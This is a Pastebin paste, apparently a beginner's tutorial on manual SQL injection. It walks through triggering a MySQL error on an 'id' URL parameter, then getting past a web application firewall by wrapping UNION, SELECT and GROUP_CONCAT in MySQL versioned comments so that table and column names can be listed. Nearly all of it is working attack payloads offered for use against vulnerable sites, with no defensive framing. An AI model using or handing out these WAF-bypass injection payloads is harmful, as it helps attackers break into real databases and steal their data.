API tools faq
paste
Advertisement
Kyfx

mysqli error injection manually for nubs

Kyfx
Jun 24th, 2015
434
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.80 KB | None | 0 0
raw download clone embed print report
  1. here we have a vulnerable url :
  2. http://example.com/sqli.php?id=1' ( mysql error )
  3. Now let's try to use the UNION SELECT statement and see what's will happened !
  4. http://example.com/sqli.php?id=1+union+select+1 ( 403 FROBIDDEN )
  5. If you see the 403 FORBIDDEN page, that's mean that WAF is enabled. so how can us bypass it ?
  6. Simply, we gonna add some mysql-comments characters for our command.
  7. So it will be :
  8. UNION+SELECT > /*!UNION*/+/*!SELECT*/
  9. group_concat(table_name) > /*!GrOuP_CoNcAT(table_name)*/
  10. group_concat(column_name) > /*!GrOuP_CoNcAT(column_name)*/
  11. So, after Replacing the normal commands with those commands, you will see that the 403 error Has been bypassed Successfully.
  12. example :
  13. http://example.com/sqli.php?id=1+/*!UNION*/+/*!SELECT*/+1 > No errors the sql injection excuted successfully
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!